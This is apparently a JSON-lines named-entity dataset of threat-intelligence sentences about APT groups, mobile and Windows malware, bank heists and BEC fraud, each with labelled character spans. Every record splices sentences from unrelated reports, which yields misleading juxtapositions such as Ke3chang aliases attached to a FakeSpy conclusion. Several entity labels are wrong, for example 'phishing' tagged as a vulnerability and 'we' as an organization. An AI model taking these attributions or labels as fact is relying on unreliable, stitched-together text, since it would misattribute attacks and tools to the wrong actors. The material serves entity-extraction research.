{"text": "In the beginning , this threat group mainly targeted Asian countries . The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . The Ke3chang group also used keyloggers and their own .NET tool to enumerate folders and dump data from Microsoft Exchange mailboxes .", "spans": [{"start": 110, "end": 119, "label": "Organization"}, {"start": 141, "end": 150, "label": "Organization"}, {"start": 164, "end": 173, "label": "Organization"}, {"start": 279, "end": 294, "label": "Organization"}, {"start": 301, "end": 315, "label": "Organization"}, {"start": 326, "end": 336, "label": "Malware"}, {"start": 351, "end": 360, "label": "Malware"}, {"start": 401, "end": 410, "label": "Organization"}]}
{"text": "Now , they are expanding their activity to audiences all around the world . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims\u2019 networks . APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets .", "spans": [{"start": 101, "end": 108, "label": "Organization"}, {"start": 133, "end": 145, "label": "System"}, {"start": 155, "end": 165, "label": "System"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 258, "end": 266, "label": "Malware"}]}
{"text": "As part of their activities , they are known for hijacking DNS settings on Japanese routers that redirect users to malicious IP addresses , creating disguised malicious Android apps that appear as popular apps , stealing Apple ID credentials by creating Apple phishing pages , as well as performing web crypto mining on browsers . FIN7 thus continues to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . This time , APT15 opted for a DNS based backdoor : RoyalDNS .", "spans": [{"start": 169, "end": 176, "label": "System"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 254, "end": 259, "label": "Organization"}, {"start": 331, "end": 335, "label": "Organization"}, {"start": 483, "end": 488, "label": "Organization"}, {"start": 501, "end": 519, "label": "Malware"}, {"start": 522, "end": 530, "label": "Malware"}]}
{"text": "CONNECTION TO CHINA Chinese server infrastructure : FakeSpy applications send stolen information to C2 domains with .club TLDs and URLs ending with /servlet/ [ C2 Command ] ( mentioned above in the \u201c Stealing Sensitive Information \u201d section ) . MuddyWater is widely regarded as a long-lived APT group in the Middle East . APT15 then used a tool known as RemoteExec .", "spans": [{"start": 52, "end": 59, "label": "Malware"}, {"start": 116, "end": 126, "label": "Indicator"}, {"start": 148, "end": 172, "label": "Indicator"}, {"start": 245, "end": 255, "label": "Organization"}, {"start": 322, "end": 327, "label": "Organization"}, {"start": 354, "end": 364, "label": "Malware"}]}
{"text": "All of these domains are registered to \u2018 Li Jun Biao \u2019 on Bizcn , Inc , a Chinese Internet application service provider . From February to April 2019 , MuddyWater launched a series of spear-phishing attacks against governments , educational institutions , financial , telecommunications and defense companies in Turkey , Iran , Afghanistan , Iraq , Tajikistan and Azerbaijan . APT15 then used a tool known as RemoteExec ( similar to Microsoft .", "spans": [{"start": 58, "end": 69, "label": "Organization"}, {"start": 152, "end": 162, "label": "Organization"}, {"start": 215, "end": 226, "label": "Organization"}, {"start": 229, "end": 253, "label": "Organization"}, {"start": 256, "end": 265, "label": "Organization"}, {"start": 268, "end": 286, "label": "Organization"}, {"start": 291, "end": 298, "label": "Organization"}, {"start": 377, "end": 382, "label": "Organization"}, {"start": 409, "end": 419, "label": "Malware"}, {"start": 433, "end": 442, "label": "Organization"}]}
{"text": "Chinese language traces in the code : During the investigation , the Cybereason Nocturnus team discovered code artifacts that may indicate Chinese threat actors . FIN7 thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . Coincidentally , following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare , we have found evidence of very recent activity by a group referred to as APT15 , known for committing cyber espionage which is believed to be affiliated with the Chinese government .", "spans": [{"start": 69, "end": 89, "label": "Organization"}, {"start": 163, "end": 167, "label": "Organization"}, {"start": 353, "end": 357, "label": "Organization"}, {"start": 500, "end": 505, "label": "Organization"}, {"start": 529, "end": 544, "label": "Organization"}]}
{"text": "For example , we found several suspicious strings written in the Chinese language in a function called isNetworkAvailable , previously discussed in this blog : An almost identical function is mentioned in an earlier research , that ties FakeSpy and other malware to the Roaming Mantis group . We also unearthed and detailed our other findings on MuddyWater , such as its connection to four Android malware variants and its use of false flag techniques , among others , in our report New MuddyWater Activities Uncovered: Threat Actors Used Multi-Stage Backdoors , False Flags , Android Malware , and More . APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more .", "spans": [{"start": 237, "end": 244, "label": "Malware"}, {"start": 270, "end": 284, "label": "Organization"}, {"start": 346, "end": 356, "label": "Organization"}, {"start": 390, "end": 405, "label": "System"}, {"start": 539, "end": 560, "label": "System"}, {"start": 563, "end": 574, "label": "System"}, {"start": 577, "end": 592, "label": "System"}, {"start": 606, "end": 611, "label": "Organization"}, {"start": 636, "end": 650, "label": "Organization"}, {"start": 765, "end": 777, "label": "Organization"}, {"start": 780, "end": 802, "label": "Organization"}, {"start": 805, "end": 813, "label": "Organization"}]}
{"text": "Chinese APK names : Some of FakeSpy \u2019 s APK package names contain anglicized Chinese ( Mandarin ) words that might be related to Chinese songs and lyrics , food , provinces , etc . Instead , the campaign used compromised legitimate accounts to trick victims into installing malware . Other names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": [{"start": 28, "end": 35, "label": "Malware"}, {"start": 209, "end": 240, "label": "System"}, {"start": 314, "end": 325, "label": "Organization"}, {"start": 328, "end": 336, "label": "Organization"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 355, "end": 369, "label": "Organization"}]}
{"text": "CONCLUSIONS FakeSpy was first seen in October 2017 and until recently mainly targeted East Asian countries . Notably , the group\u2019s use of email as infection vector seems to yield success for their campaigns . ther names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": [{"start": 12, "end": 19, "label": "Malware"}, {"start": 123, "end": 130, "label": "Organization"}, {"start": 138, "end": 143, "label": "System"}, {"start": 238, "end": 249, "label": "Organization"}, {"start": 252, "end": 260, "label": "Organization"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 279, "end": 293, "label": "Organization"}]}
{"text": "Our research shows fresh developments in the malware \u2019 s code and sophistication , as well as an expansion to target Europe and North America . We also observed MuddyWater\u2019s use of multiple open source post-exploitation tools , which they deployed after successfully compromising a target . There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group .", "spans": [{"start": 161, "end": 173, "label": "Organization"}, {"start": 202, "end": 225, "label": "System"}, {"start": 343, "end": 348, "label": "Organization"}, {"start": 395, "end": 404, "label": "Organization"}]}
{"text": "This mobile malware masquerades as legitimate , trusted postal service applications so that it can gain the users trust . The attacker also connected to the compromised servers from IP addresses that were linked to dynamic domain names used as C&Cs by the delivered payloads . There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group ; although posted in March 2018 , it refers to a campaign in 2017 .", "spans": [{"start": 126, "end": 134, "label": "Organization"}, {"start": 256, "end": 274, "label": "System"}, {"start": 329, "end": 334, "label": "Organization"}, {"start": 381, "end": 390, "label": "Organization"}]}
{"text": "Once it has been installed , it requests permissions from the user so that it can steal sensitive data , manipulate SMS messages , and potentially infect contacts of the user . The main payload is usually Imminent Monitor RAT; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . both attributed to Chinese government affiliated groups .", "spans": [{"start": 214, "end": 226, "label": "Malware"}, {"start": 292, "end": 310, "label": "Malware"}, {"start": 313, "end": 324, "label": "Malware"}, {"start": 331, "end": 336, "label": "Malware"}]}
{"text": "The malware now targets more countries all over the world by masquerading as official post office and transportation services apps . In a case in June 2019 , we also noticed Warzone RAT being used . DLL hijacking techniques have been seen in the past with the APT15 group .", "spans": [{"start": 174, "end": 185, "label": "Malware"}, {"start": 260, "end": 271, "label": "Organization"}]}
{"text": "These apps appear legitimate due to their app logo , UI appearance , and redirects to the carrier webpage -- all luring end users to believe it \u2019 s the original one . Xpert RAT reportedly first appeared in 2011 . cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally .", "spans": [{"start": 167, "end": 176, "label": "Malware"}, {"start": 213, "end": 225, "label": "Organization"}, {"start": 260, "end": 265, "label": "Organization"}, {"start": 268, "end": 277, "label": "Organization"}, {"start": 280, "end": 289, "label": "Organization"}, {"start": 296, "end": 327, "label": "Organization"}]}
{"text": "In this blog , we showed that the threat actor behind the recent FakeSpy campaign is a Chinese-speaking group called \u201c Roaming Mantis \u201d known to operate mainly in Asia . The first version of Proyecto RAT\u201d was published at the end of 2010 . The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA .", "spans": [{"start": 65, "end": 72, "label": "Malware"}, {"start": 119, "end": 133, "label": "Organization"}, {"start": 191, "end": 204, "label": "Malware"}, {"start": 244, "end": 259, "label": "Organization"}, {"start": 333, "end": 345, "label": "Organization"}]}
{"text": "It is interesting to see that the group has expanded their operation to other regions , such as the United States and Europe . But with the West African gang we\u2019ve named Scattered Canary , we have a deeper look at how business email compromise is connected to the rest of the cybercrime . Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware .", "spans": [{"start": 170, "end": 186, "label": "Organization"}, {"start": 320, "end": 339, "label": "Organization"}, {"start": 348, "end": 360, "label": "Malware"}, {"start": 363, "end": 373, "label": "Malware"}, {"start": 376, "end": 395, "label": "Malware"}, {"start": 398, "end": 402, "label": "Malware"}, {"start": 411, "end": 416, "label": "Malware"}, {"start": 417, "end": 424, "label": "Malware"}]}
{"text": "The malware authors seem to be putting a lot of effort into improving this malware , bundling it with numerous new upgrades that make it more sophisticated , evasive , and well-equipped . In a recent report , the FBI\u2019s Internet Crime Complaint Center (IC3) reported that more than 20 , 000 businesses lost nearly $1.3 billion to BEC attacks in 2018 . Variants of malware and tools used by HIDDEN COBRA actors include Destover and Hangman .", "spans": [{"start": 213, "end": 218, "label": "Organization"}, {"start": 290, "end": 300, "label": "Organization"}, {"start": 389, "end": 408, "label": "Organization"}, {"start": 417, "end": 425, "label": "Malware"}, {"start": 430, "end": 437, "label": "Malware"}]}
{"text": "These improvements render FakeSpy one of the most powerful information stealers on the market . This investigation by the Agari Cyber Intelligence Division into the cybercriminal group we\u2019ve named Scattered Canary offers unprecedented visibility into eleven years of fraud and criminal activities , and the growth of a 419 startup into a fully operational BEC business . DHS has previously released Alert TA14-353A .", "spans": [{"start": 26, "end": 33, "label": "Malware"}, {"start": 122, "end": 146, "label": "Organization"}, {"start": 179, "end": 184, "label": "Organization"}, {"start": 197, "end": 213, "label": "Organization"}, {"start": 360, "end": 368, "label": "Organization"}, {"start": 371, "end": 374, "label": "Organization"}]}
{"text": "We anticipate this malware to continue to evolve with additional new features ; the only question now is when we will see the next wave . While this criminal organization\u2019s activities now center around BEC , and extend to romance scams , credit card fraud , check fraud , fake job listings , credential harvesting , tax schemes , and more , these actors came from much humbler beginnings , starting with basic Craigslist scams in 2008 . The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report .", "spans": [{"start": 158, "end": 172, "label": "Organization"}, {"start": 490, "end": 497, "label": "Organization"}]}
{"text": "First Twitter\u2011controlled Android botnet discovered Detected by ESET as Android/Twitoor , this malware is unique because of its resilience mechanism . On November 29 , 2018 , Scattered Canary sent an attack email to Agari CFO Raymond Lim , enquiring as to his availability to send out a domestic wire transfer . Our analysis shows that the cybercriminals behind the attack against an online casino in Central America , and several other targets in late-2017 , were most likely the infamous Lazarus hacking group .", "spans": [{"start": 6, "end": 24, "label": "System"}, {"start": 25, "end": 32, "label": "System"}, {"start": 63, "end": 67, "label": "Organization"}, {"start": 71, "end": 86, "label": "Malware"}, {"start": 174, "end": 190, "label": "Organization"}, {"start": 339, "end": 353, "label": "Organization"}, {"start": 489, "end": 510, "label": "Organization"}]}
{"text": "Instead of being controlled by a traditional command-and-control server , it receives instructions via tweets . Many feel that they have a home team advantage living in Nigeria , where they are free to pay off law enforcement to look the other way . The Lazarus Group was first identified in Novetta 's report Operation Blockbuster in February 2016 .", "spans": [{"start": 185, "end": 189, "label": "Organization"}, {"start": 254, "end": 267, "label": "Organization"}, {"start": 292, "end": 299, "label": "Organization"}]}
{"text": "24 Aug 2016 - 02:05PM Android/Twitoor is a backdoor capable of downloading other malware onto an infected device . Scattered Canary\u2019s fraudulent history can be traced as far back as October 2008 , when the group first arrived on the cybercriminal circuit . cyberattacks against high-value targets in Ukraine in December 2015 and December 2016 .", "spans": [{"start": 22, "end": 37, "label": "Malware"}, {"start": 115, "end": 133, "label": "Organization"}, {"start": 206, "end": 211, "label": "Organization"}]}
{"text": "It has been active for around one month . By March 2016 , one of Scattered Canary\u2019s members had built enough trust with a romance victim\u2014who we\u2019ll call Jane\u2014that she became a frequent source of new mule accounts for the group . In all of these incidents , the Lazarus utilized similar toolsets , including KillDisk that was executed on compromised machines .", "spans": [{"start": 65, "end": 83, "label": "Organization"}, {"start": 220, "end": 225, "label": "Organization"}, {"start": 260, "end": 267, "label": "Organization"}, {"start": 306, "end": 314, "label": "Malware"}]}
{"text": "This malicious app , detected by ESET as a variant of Android/Twitoor.A , can \u2019 t be found on any official Android app store \u2013 it probably spreads by SMS or via malicious URLs . Alpha\u2019s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . We are confident this KillDisk malware was deployed by Lazarus , rather than by another , unrelated attacker .", "spans": [{"start": 33, "end": 37, "label": "Organization"}, {"start": 54, "end": 71, "label": "Malware"}, {"start": 107, "end": 124, "label": "System"}, {"start": 178, "end": 185, "label": "Organization"}, {"start": 377, "end": 385, "label": "Malware"}, {"start": 386, "end": 393, "label": "Malware"}, {"start": 410, "end": 417, "label": "Organization"}, {"start": 455, "end": 463, "label": "Organization"}]}
{"text": "It impersonates a porn player app or MMS application but without having their functionality . By all accounts , late 2015 was the beginning of BEC for Scattered Canary . This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack ( we didn't see these exact samples anywhere else ) .", "spans": [{"start": 151, "end": 167, "label": "Organization"}, {"start": 270, "end": 277, "label": "Organization"}]}
{"text": "After launching , it hides its presence on the system and checks the defined Twitter account at regular intervals for commands . The first type of attack Scattered Canary pivoted to was credential phishing . Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage .", "spans": [{"start": 77, "end": 84, "label": "System"}, {"start": 154, "end": 170, "label": "Organization"}, {"start": 218, "end": 226, "label": "Malware"}, {"start": 295, "end": 304, "label": "Organization"}, {"start": 399, "end": 413, "label": "Organization"}]}
{"text": "Based on received commands , it can either download malicious apps or switch the C & C Twitter account to another one . Between July 2015 and February 2016 , Scattered Canary\u2019s primary focus seemed to be mass harvesting general credentials using a Google Docs phishing page . Today we'd like to share some of our findings , and add something new to what 's currently common knowledge about Lazarus Group activities , and their connection to the much talked about February 2016 incident , when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank .", "spans": [{"start": 87, "end": 94, "label": "System"}, {"start": 158, "end": 176, "label": "Organization"}, {"start": 504, "end": 512, "label": "Organization"}, {"start": 553, "end": 576, "label": "Organization"}]}
{"text": "\u201c Using Twitter instead of command-and-control ( C & C ) servers is pretty innovative for an Android botnet. \u201d \u201c Using Twitter instead of command-and-control ( C & C ) servers is pretty innovative for an Android botnet , \u201d says Luk\u00e1\u0161 \u0160tefanko , the ESET malware researcher who discovered the malicious app . In the first few months of their credential phishing ventures , Scattered Canary\u2019s sights were mostly set on Asian targets\u2014Malaysia and Japan , in particular . Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist .", "spans": [{"start": 8, "end": 15, "label": "System"}, {"start": 93, "end": 100, "label": "System"}, {"start": 119, "end": 126, "label": "Organization"}, {"start": 204, "end": 211, "label": "System"}, {"start": 249, "end": 253, "label": "Organization"}, {"start": 372, "end": 390, "label": "Organization"}, {"start": 568, "end": 581, "label": "Organization"}, {"start": 601, "end": 605, "label": "Organization"}]}
{"text": "Malware that enslaves devices to form botnets needs to be able to receive updated instructions . In November 2015 , the group started to focus on North American users , mostly in the United States . However , from this it 's only clear that Lazarus might have attacked Polish banks .", "spans": [{"start": 120, "end": 125, "label": "Organization"}, {"start": 241, "end": 248, "label": "Organization"}, {"start": 276, "end": 281, "label": "Organization"}]}
{"text": "That communication is an Achilles heel for any botnet \u2013 it may raise suspicion and , cutting the bots off is always lethal to the botnet \u2019 s functioning . This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": [{"start": 230, "end": 246, "label": "Organization"}, {"start": 291, "end": 299, "label": "Organization"}, {"start": 326, "end": 333, "label": "Organization"}, {"start": 371, "end": 380, "label": "Organization"}]}
{"text": "Additionally , should the command-and-control ( C & C ) servers get seized by the authorities , it would ultimately lead to disclosing information about the entire botnet . In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers , it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions , or if Lazarus had in fact developed its own malware to attack banks ' systems .", "spans": [{"start": 184, "end": 200, "label": "Organization"}, {"start": 269, "end": 277, "label": "Vulnerability"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 408, "end": 417, "label": "Organization"}, {"start": 447, "end": 454, "label": "Organization"}, {"start": 525, "end": 532, "label": "Organization"}, {"start": 581, "end": 586, "label": "Organization"}]}
{"text": "To make the Twitoor botnet \u2019 s communication more resilient , botnet designers took various steps like encrypting their messages , using complex topologies of the C & C network \u2013 or using innovative means for communication , among them the use of social networks . For over eighteen months from March 2017 until November 2018 , Scattered Canary\u2019s frequent enterprise-focused credential phishing campaigns almost exclusively targeted businesses in the United States and Canada . We would like to add some strong facts that link some attacks on banks to Lazarus , and share some of our own findings as well as shed some light on the recent TTPs used by the attacker , including some yet unpublished details from the attack in Europe in 2017 .", "spans": [{"start": 12, "end": 19, "label": "Malware"}, {"start": 328, "end": 346, "label": "Organization"}, {"start": 543, "end": 548, "label": "Organization"}, {"start": 552, "end": 559, "label": "Organization"}, {"start": 655, "end": 663, "label": "Organization"}]}
{"text": "\u201c These communication channels are hard to discover and even harder to block entirely . In July 2018 , following a trend we have observed across the entire BEC threat landscape , Scattered Canary changed their preferred cash out mechanism from wire transfers to gift cards . Lazarus attacks are not a local problem and clearly the group 's operations span across the whole world .", "spans": [{"start": 179, "end": 195, "label": "Organization"}]}
{"text": "On the other hand , it \u2019 s extremely easy for the crooks to re-direct communications to another freshly created account , \u201d explains \u0160tefanko . Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . Lazarus was previously known to conduct cyberespionage and cybersabotage activities , such as attacks on Sony Pictures Entertainment with volumes of internal data leaked , and many system harddrives in the company wiped .", "spans": [{"start": 239, "end": 255, "label": "Organization"}, {"start": 361, "end": 368, "label": "Organization"}, {"start": 466, "end": 493, "label": "Organization"}]}
{"text": "In the Windows space , Twitter , founded in 2006 , was first used to control botnets as early as in 2009 . Using personal information obtained from various sources , Scattered Canary started perpetrating fraud against US federal and state government agencies . We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations , while a substantially smaller units within the group , which we have dubbed Bluenoroff , is responsible for financial profit .", "spans": [{"start": 7, "end": 14, "label": "System"}, {"start": 23, "end": 30, "label": "Organization"}, {"start": 166, "end": 182, "label": "Organization"}, {"start": 233, "end": 258, "label": "Organization"}, {"start": 277, "end": 290, "label": "Organization"}, {"start": 441, "end": 451, "label": "Organization"}]}
{"text": "Android bots have also already been found being controlled via other non-traditional means \u2013 blogs or some of the many cloud messaging systems like Google \u2019 s or Baidu \u2019 s \u2013 but Twitoor is the first Twitter-based bot malware , according to \u0160tefanko . In total , 35 actors have been tied to Scattered Canary\u2019s operations since the group emerged in 2008 . Lazarus regrouped and rushed into new countries , selecting mostly poorer and less developed locations , hitting smaller banks because they are , apparently , easy prey .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 148, "end": 154, "label": "Organization"}, {"start": 162, "end": 167, "label": "Organization"}, {"start": 178, "end": 185, "label": "Malware"}, {"start": 199, "end": 212, "label": "System"}, {"start": 290, "end": 308, "label": "Organization"}, {"start": 354, "end": 361, "label": "Organization"}, {"start": 475, "end": 480, "label": "Organization"}]}
{"text": "\u201c In the future , we can expect that the bad guys will try to make use of Facebook statuses or deploy LinkedIn and other social networks \u201d , states ESET \u2019 s researcher . Just as with romance scams , actors make use of scripts and templates they can copy-and-paste without having to create something on their own . To date , the Lazarus group has been one of the most successful in launching large scale operations against the financial industry .", "spans": [{"start": 74, "end": 82, "label": "System"}, {"start": 102, "end": 110, "label": "System"}, {"start": 148, "end": 152, "label": "Organization"}, {"start": 199, "end": 205, "label": "Organization"}, {"start": 218, "end": 225, "label": "System"}, {"start": 230, "end": 239, "label": "System"}, {"start": 328, "end": 341, "label": "Organization"}, {"start": 426, "end": 444, "label": "Organization"}]}
{"text": "Currently , the Twitoor trojan has been downloading several versions of mobile banking malware . When it comes to engaging targets , Scattered Canary frequently maximized efficiencies through the use of scripts , or as some members of the group call them , formats.\u201d These formats are templated text documents that can contain several layers of phishing messages to send to potential victims . We believe that Lazarus will remain one of the biggest threats to the banking sector , finance , and trading companies , as well as casinos for the next few years .", "spans": [{"start": 16, "end": 23, "label": "Malware"}, {"start": 133, "end": 149, "label": "Organization"}, {"start": 410, "end": 417, "label": "Organization"}, {"start": 464, "end": 478, "label": "Organization"}, {"start": 481, "end": 488, "label": "Organization"}, {"start": 495, "end": 512, "label": "Organization"}, {"start": 526, "end": 533, "label": "Organization"}]}
{"text": "However , the botnet operators can start distributing other malware , including ransomware , at any time warns \u0160tefanko . Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group . We believe Lazarus started this watering hole attack at the end of 2016 after their other operation was interrupted in South East Asia .", "spans": [{"start": 186, "end": 191, "label": "System"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 246, "end": 253, "label": "Organization"}]}
{"text": "\u201c Twitoor serves as another example of how cybercriminals keep on innovating their business , \u201d Stefanko continues . If Scattered Canary can be seen as a microcosm for the rapidly evolving organizations behind today\u2019s most pernicious email scams , this report demonstrates that a much more holistic approach\u2014one based on threat actor identity rather than type of fraudulent activity\u2014is required to detect email fraud and protect organizations . We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia .", "spans": [{"start": 2, "end": 9, "label": "Malware"}, {"start": 120, "end": 136, "label": "Organization"}]}
{"text": "\u201c The takeaway ? This is a first for an APT group , and shows Sednit has access to very sophisticated tools to conduct its espionage operations . A rudimentary but somewhat clever design , KiloAlfa provides keylogging capability for the Lazarus Group 's collection of malicious tools .", "spans": [{"start": 62, "end": 68, "label": "Organization"}, {"start": 88, "end": 107, "label": "System"}, {"start": 189, "end": 197, "label": "Malware"}, {"start": 237, "end": 250, "label": "Organization"}]}
{"text": "Internet users should keep on securing their activities with good security solutions for both computers and mobile devices. \u201d Hashes : E5212D4416486AF42E7ED1F58A526AEF77BE89BE A9891222232145581FE8D0D483EDB4B18836BCFC AFF9F39A6CA5D68C599B30012D79DA29E2672C6E Insidious Android malware gives up all malicious features but one to gain stealth ESET researchers detect a new way of misusing Accessibility Three years ago , the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia . The design of KiloAlfa is broken down into two basic components : the persistence functionality and the keylogging functionality .", "spans": [{"start": 135, "end": 175, "label": "Indicator"}, {"start": 176, "end": 216, "label": "Indicator"}, {"start": 217, "end": 257, "label": "Indicator"}, {"start": 268, "end": 275, "label": "System"}, {"start": 340, "end": 344, "label": "Organization"}, {"start": 422, "end": 428, "label": "Organization"}, {"start": 551, "end": 559, "label": "Malware"}, {"start": 641, "end": 665, "label": "Malware"}]}
{"text": "Service , the Achilles \u2019 heel of Android security 22 May 2020 - 03:00PM ESET researchers have analyzed an extremely dangerous Android app that can perform a host of nefarious actions , notably wiping out the victim \u2019 s bank account or cryptocurrency wallet and taking over their email or social media accounts . In the past , Sednit used a similar technique for credential phishing . The persistence functionality of KiloAlfa allows the malware to self-install on a victim 's machine when activated ( described below ) .", "spans": [{"start": 33, "end": 40, "label": "System"}, {"start": 72, "end": 76, "label": "Organization"}, {"start": 126, "end": 133, "label": "System"}, {"start": 326, "end": 332, "label": "Organization"}, {"start": 417, "end": 425, "label": "Malware"}]}
{"text": "Called \u201c DEFENSOR ID \u201d , the banking trojan was available on Google Play at the time of the analysis . At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components . Evidence suggest that the Lazarus Group uses compromised infrastructure as the public-facing touchpoint for the majority of their malware samples .", "spans": [{"start": 9, "end": 20, "label": "Malware"}, {"start": 61, "end": 72, "label": "System"}, {"start": 305, "end": 318, "label": "Organization"}, {"start": 324, "end": 350, "label": "Malware"}]}
{"text": "The app is fitted with standard information-stealing capabilities ; however , this banker is exceptionally insidious in that after installation it requires a single action from the victim \u2013 enable Android \u2019 s Accessibility Service \u2013 to fully unleash the app \u2019 s malicious functionality . As we explained in our most recent blogpost about Zebrocy , the configuration of the backdoor is stored in in the resource section and is split into four different hex-encoded , encrypted blobs . PapaAlfa is believed to be one of the proxy malware components that the Lazarus Group uses to hide the true command and control server for operations .", "spans": [{"start": 197, "end": 204, "label": "System"}, {"start": 291, "end": 293, "label": "Organization"}, {"start": 338, "end": 345, "label": "Organization"}, {"start": 373, "end": 381, "label": "System"}, {"start": 484, "end": 492, "label": "Malware"}, {"start": 556, "end": 569, "label": "Organization"}]}
{"text": "The DEFENSOR ID app made it onto the heavily guarded Google Play store thanks to its extreme stealth . The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . Rather , PapaAlfa could be considered a smart proxy due in part to the fact that the Lazarus can easily switch the backend destination address and PROT without having to reestablish control over the infected machine hosting the PapaAlfa malware .", "spans": [{"start": 4, "end": 15, "label": "Malware"}, {"start": 53, "end": 70, "label": "System"}, {"start": 125, "end": 129, "label": "Organization"}, {"start": 184, "end": 197, "label": "Vulnerability"}, {"start": 243, "end": 251, "label": "Malware"}, {"start": 319, "end": 326, "label": "Organization"}, {"start": 462, "end": 470, "label": "Malware"}, {"start": 471, "end": 478, "label": "Malware"}]}
{"text": "Its creators reduced the app \u2019 s malicious surface to the bare minimum by removing all potentially malicious functionalities but one : abusing Accessibility Service . It used GitHub and Slack as tools for communication between the malware and its controller . In terms of form factor , PapaAlfa comes in two flavors : service DLL and standalone executable .", "spans": [{"start": 167, "end": 169, "label": "Organization"}, {"start": 175, "end": 181, "label": "System"}, {"start": 186, "end": 191, "label": "System"}, {"start": 286, "end": 294, "label": "Malware"}, {"start": 318, "end": 329, "label": "Malware"}, {"start": 334, "end": 355, "label": "Malware"}]}
{"text": "Accessibility Service is long known to be the Achilles \u2019 heel of the Android operating system . On July 9 , we discovered a new version of SLUB delivered via another unique watering hole website . The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant .", "spans": [{"start": 69, "end": 76, "label": "System"}, {"start": 108, "end": 110, "label": "Organization"}, {"start": 139, "end": 143, "label": "Organization"}, {"start": 201, "end": 230, "label": "Malware"}, {"start": 273, "end": 276, "label": "System"}]}
{"text": "Security solutions can detect it in countless combinations with other suspicious permissions and functions , or malicious functionalities \u2013 but when faced with no additional functionality nor permission , all failed to trigger any alarm on DEFENSOR ID . This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro\u2019s Zero Day Initiative (ZDI) that was just patched this April . While the tools profiled in this report are not inherently malicious , their capabilities are nonetheless integral to the Lazarus Group 's cyber operations , both espionage and destructive in nature , making them inherently dangerous to potential victims .", "spans": [{"start": 240, "end": 251, "label": "Malware"}, {"start": 279, "end": 292, "label": "Vulnerability"}, {"start": 344, "end": 357, "label": "Organization"}, {"start": 541, "end": 554, "label": "Organization"}]}
{"text": "By \u201c all \u201d we mean all security mechanisms guarding the official Android app store ( including the detection engines of the members of the App Defense Alliance ) and all security vendors participating in the VirusTotal program ( see Figure 1 ) . Since we published out last report on SLUB , the backdoor has been updated and several improvements were implemented . These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures .", "spans": [{"start": 65, "end": 82, "label": "System"}, {"start": 139, "end": 159, "label": "Organization"}, {"start": 208, "end": 218, "label": "Organization"}, {"start": 252, "end": 254, "label": "Organization"}, {"start": 284, "end": 288, "label": "Organization"}, {"start": 295, "end": 303, "label": "System"}]}
{"text": "DEFENSOR ID was released on Feb 3 , 2020 and last updated to v1.4 on May 6 , 2020 . The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . Furthermore , like many other identified Lazarus Group families , these tools showcase the group 's creative solutions , such as the PapaAlfa , which makes it difficult to immediately identify potentially malicious activity on a compromised network .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 88, "end": 92, "label": "Organization"}, {"start": 183, "end": 196, "label": "Vulnerability"}, {"start": 200, "end": 213, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Organization"}, {"start": 349, "end": 357, "label": "Malware"}]}
{"text": "The latest version is analyzed here ; we weren \u2019 t able to determine if the earlier versions were also malicious . During this attack , we found that the SLUB malware used two Slack teams sales-yww9809\u201d and marketing-pwx7789 . The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine .", "spans": [{"start": 154, "end": 158, "label": "Organization"}, {"start": 269, "end": 275, "label": "Malware"}]}
